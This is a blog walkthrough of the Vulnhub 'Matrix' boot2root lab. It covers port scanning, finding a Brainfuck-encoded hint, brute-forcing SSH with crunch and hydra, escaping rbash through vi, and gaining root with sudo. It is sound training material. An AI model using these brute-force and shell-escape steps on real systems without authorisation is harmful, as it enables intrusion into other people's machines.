Today little training: Matrix (from Vulnhub).
Since I was in holidays last week, it's time for little exercise.

Description:

Matrix is a medium level boot2 root challenge. The OVA has been tested on both VMware and Virtual Box.
Difficulty: Intermediate
Flags: Your Goal is to get root and read /root/flag.txt
Networking: DHCP: Enabled IP Address: Automatically assigned
Hint: Follow your intuitions ... and enumerate!
For any questions, feel free to contact me on Twitter: @unknowndevice64


URL: https://www.vulnhub.com/entry/matrix-1,259/



Setup

Because of KISS principle I will export the IP of the target as env. variable.

export IP=192.168.56.106

If you need a little memo about pentest tools, check mine at (almost regularly updated):
https://gitlab.com/AGS_321/pentest_wiki/wikis/home

So let's begin the rock !

Port scan

nmap -A -T4 -n -p- -oN nmap_out_$(date +%Y-%m-%d:%H:%M:%S).txt $IP
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-28 22:58 CET
Nmap scan report for 192.168.56.106
Host is up (0.00045s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)
|   256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)
|_  256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (ED25519)
80/tcp    open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
MAC Address: 08:00:27:89:02:83 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.45 ms 192.168.56.106

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.20 seconds

So we have:

  • SSH service (22)
  • Webserver (80)
  • Webserver (31337)

Webserver 31337

Let's run a nikto scan. (force of the habit)

nikto -host http://$IP:31337/ -Format txt -output nikto_out_$(date +%Y-%m-%d:%H:%M:%S).txt

The only useful result is here.

Server: SimpleHTTP/0.6 Python/2.7.14
SimpleHTTP/0.6 appears to be outdated (current is at least 1.2)

As the subject says let's "enumerate"

gobuster -u http://$IP:31337/ -w /usr/share/dirb/wordlists/common.txt -x txt,php

unfortunately, nothing useful for me...

Let's move to others services.

Webserver 80

nikto -h http://$IP/ -Format txt -output nikto_out_$(date +%Y-%m-%d:%H:%M:%S).txt

As you can see I've tried many enurmation but nothing...

gobuster -u $IP -w /usr/share/dirb/wordlists/common.txt -x txt,php

gobuster -u $IP -w /usr/share/wordlists/wfuzz/general/big.txt -x txt,php

After a break I took the time to look more closely at the results of my scans and finally found something usable

On the source code of http://192.168.56.106:31337/ at line 71.

A little bit of b64 inside HTML comment

Once decoded I get this.

echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix

So let's download it !

wget http://192.168.56.106:31337/Cypher.matrix
+++++ ++++[ ->+++ +++++ +<]>+ +++++ ++.<+ +++[- >++++ <]>++ ++++. +++++
+.<++ +++++ ++[-> ----- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]> +++.-
-.<++ +[->+ ++<]> ++++. <++++ ++++[ ->--- ----- <]>-- ----- ----- --.<+
+++++ ++[-> +++++ +++<] >++++ +.+++ +++++ +.+++ +++.< +++[- >---< ]>---
---.< +++[- >+++< ]>+++ +.<++ +++++ ++[-> ----- ----< ]>-.< +++++ +++[-
>++++ ++++< ]>+++ +++++ +.+++ ++.++ ++++. ----- .<+++ +++++ [->-- -----
-<]>- ----- ----- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ +.<++
+[->- --<]> ---.< ++++[ ->+++ +<]>+ ++.-- .---- ----- .<+++ [->++ +<]>+
+++++ .<+++ +++++ +[->- ----- ---<] >---- ---.< +++++ +++[- >++++ ++++<
]>+.< ++++[ ->+++ +<]>+ +.<++ +++++ ++[-> ----- ----< ]>--. <++++ ++++[
->+++ +++++ <]>++ +++++ .<+++ [->++ +<]>+ ++++. <++++ [->-- --<]> .<+++
[->++ +<]>+ ++++. +.<++ +++++ +[->- ----- --<]> ----- ---.< +++[- >---<
]>--- .<+++ +++++ +[->+ +++++ +++<] >++++ ++.<+ ++[-> ---<] >---- -.<++
+[->+ ++<]> ++.<+ ++[-> ---<] >---. <++++ ++++[ ->--- ----- <]>-- -----
-.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ +++++ +.<++ +[->- --<]> -----
-.<++ ++[-> ++++< ]>++. .++++ .---- ----. +++.< +++[- >---< ]>--- --.<+
+++++ ++[-> ----- ---<] >---- .<+++ +++++ [->++ +++++ +<]>+ +++++ +++++
.<+++ ++++[ ->--- ----< ]>--- ----- -.<++ +++++ [->++ +++++ <]>++ +++++
+++.. <++++ +++[- >---- ---<] >---- ----- --.<+ +++++ ++[-> +++++ +++<]
>++.< +++++ [->-- ---<] >-..< +++++ +++[- >---- ----< ]>--- ----- ---.-
--.<+ +++++ ++[-> +++++ +++<] >++++ .<+++ ++[-> +++++ <]>++ +++++ +.+++
++.<+ ++[-> ---<] >---- --.<+ +++++ [->-- ----< ]>--- ----. <++++ +[->-
----< ]>-.< +++++ [->++ +++<] >++++ ++++. <++++ +[->+ ++++< ]>+++ +++++
+.<++ ++[-> ++++< ]>+.+ .<+++ +[->- ---<] >---- .<+++ [->++ +<]>+ +..<+
++[-> +++<] >++++ .<+++ +++++ [->-- ----- -<]>- ----- ----- --.<+ ++[->
---<] >---. <++++ ++[-> +++++ +<]>+ ++++. <++++ ++[-> ----- -<]>- ----.
<++++ ++++[ ->+++ +++++ <]>++ ++++. +++++ ++++. +++.< +++[- >---< ]>--.
--.<+ ++[-> +++<] >++++ ++.<+ +++++ +++[- >---- ----- <]>-- -.<++ +++++
+[->+ +++++ ++<]> +++++ +++++ ++.<+ ++[-> ---<] >--.< ++++[ ->+++ +<]>+
+.+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++
+.+++ .---- ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++
+++[- >++++ ++++< ]>+++ .++++ +.--- ----. <++++ [->++ ++<]> +.<++ ++[->
----< ]>-.+ +.<++ ++[-> ++++< ]>+.< +++[- >---< ]>--- ---.< +++[- >+++<
]>+++ +.+.< +++++ ++++[ ->--- ----- -<]>- -.<++ +++++ ++[-> +++++ ++++<
]>++. ----. <++++ ++++[ ->--- ----- <]>-- ----- ----- ---.< +++++ +[->+
+++++ <]>++ +++.< +++++ +[->- ----- <]>-- ---.< +++++ +++[- >++++ ++++<
]>+++ +++++ .---- ---.< ++++[ ->+++ +<]>+ ++++. <++++ [->-- --<]> -.<++
+++++ +[->- ----- --<]> ----- .<+++ +++++ +[->+ +++++ +++<] >+.<+ ++[->
---<] >---- .<+++ [->++ +<]>+ +.--- -.<++ +[->- --<]> --.++ .++.- .<+++
+++++ [->-- ----- -<]>- ---.< +++++ ++++[ ->+++ +++++ +<]>+ +++++ .<+++
[->-- -<]>- ----. <+++[ ->+++ <]>++ .<+++ [->-- -<]>- --.<+ +++++ ++[->
----- ---<] >---- ----. <++++ +++[- >++++ +++<] >++++ +++.. <++++ +++[-
>---- ---<] >---- ---.< +++++ ++++[ ->+++ +++++ +<]>+ ++.-- .++++ +++.<
+++++ ++++[ ->--- ----- -<]>- ----- --.<+ +++++ +++[- >++++ +++++ <]>++
+++++ +.<++ +[->- --<]> -.+++ +++.- --.<+ +++++ +++[- >---- ----- <]>-.
<++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ .++++ +++++ .<+++ +[->- ---<]
>--.+ +++++ ++.<+ +++++ ++[-> ----- ---<] >---- ----- --.<+ +++++ ++[->
+++++ +++<] >+.<+ ++[-> +++<] >++++ .<+++ [->-- -<]>- .<+++ +++++ [->--
----- -<]>- ---.< +++++ +++[- >++++ ++++< ]>+++ +++.+ ++.++ +++.< +++[-
>---< ]>-.< +++++ +++[- >---- ----< ]>--- -.<++ +++++ +[->+ +++++ ++<]>
+++.< +++[- >+++< ]>+++ .+++. .<+++ [->-- -<]>- ---.- -.<++ ++[-> ++++<
]>+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++
.+.-- .---- ----- .++++ +.--- ----. <++++ ++++[ ->--- ----- <]>-- -----
.<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ ++++. ----- ----. <++++ ++++[
->--- ----- <]>-- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ ++++.
<+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..+ +++.- ----- --.++ +.<++
+[->- --<]> ----- .<+++ ++++[ ->--- ----< ]>--- --.<+ ++++[ ->--- --<]>
----- ---.- --.<

It's BrainFuck program, let's found a tool to decipher it.

This program display the following text.

You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.

It seems obvious that we will have to bruteforce SSH authentication.

Bruteforce SSH

The plan:

  1. Generate wordlist following the pattern given (Crunch is the perfect tool for that)
  2. Use hydra to test this wordlist

Generate the wordlist using only lower case letter (because subject say "2 characters") and I feel lucky enough to no try upper case.

crunch 8 8 -t k1ll0r@@ -o specific_wordlist.txt
Ok not lucky enough...

Let's use all lowercase, uppercase and numeric combinations possible !

Because I use Kali as pentest distro, I should adapt my commands from the manual.

Let's found the definition of available charsets for crunch.

locate charset.lst
/usr/share/crunch/charset.lst

Now let's generate the wordlist.

crunch 8 8 -f /usr/share/crunch/charset.lst mixalpha-numeric-all-space -t k1ll0r@@ -o specific_wordlist.txt

Use hydra to test this wordlist

hydra  -l guest -P specific_wordlist.txt 192.168.56.106 -t 10 ssh

And boom !

[22][ssh] host: 192.168.56.106   login: guest   password: k1ll0r7n
Hydra found the password

Bypass the restricted shell

So once logged I'm confronted to rbash:

I've done my homework and come back with this document about rbash: https://docs.oracle.com/cd/E36784_01/html/E36870/rbash-1.html
And this little guide to bypass restricted shell:

To bypass restriction:

  1. run VI
  2. run :!/bin/sh from within VI

And voila, I manage to get a shell but there is a little kink, I can't use every commands I want (such ls).
Although I knew due to rshell, the PATH variable had been modified, so I added some locations.

Now that I have all the tool I want let's do basic recognition.
Let's check account on the target (force of the habit).

Boom

Become root and get the final flag

If I read that correctly, the guest account is part of "sudoers", meanings that know I can summon sudo with the password of guest.
let's check that out!

Now I can become root via a simple trick:

sudo su

The last flag is waiting: let's go !

Conclusion

And done !

Done

A good little exercise after holidays.


Social stuff / Questions / Comments

Feel free to reach or tips me !

Mail: a_ghost_soul@protonmail.com
Twitter: @GhostAgs

If you appreciate my work please consider make a donation
Tipeee: https://fr.tipeee.com/ags-syndrome